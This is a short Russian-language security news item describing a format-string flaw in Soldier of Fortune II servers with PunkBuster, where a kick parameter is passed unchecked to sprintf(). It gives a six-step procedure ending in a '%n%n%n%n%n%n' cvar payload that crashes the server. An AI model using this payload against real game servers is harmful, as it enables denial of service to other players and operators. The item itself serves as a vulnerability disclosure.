Используя систему защиты PunkBuster можно
обрушить сервер Soldier of Fortune II. Сервер не
проверяет параметр, переданный ему
системой PB для кика игрока передавая его
прямо функции sprintf(), что создает идеальные
условия для уязвимости форматной строки.

Эксплуатация:

  1. Запускаем клиент
  2. Коннектимся к серверу с PunkBuster
  3. Пишем /pb_cvarlist
  4. Выбираем один из них
  5. Пишем /set CVAR %n%n%n%n%n%n, например /set snaps
    %n%n%n%n%n%n
  6. Сервер падает

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии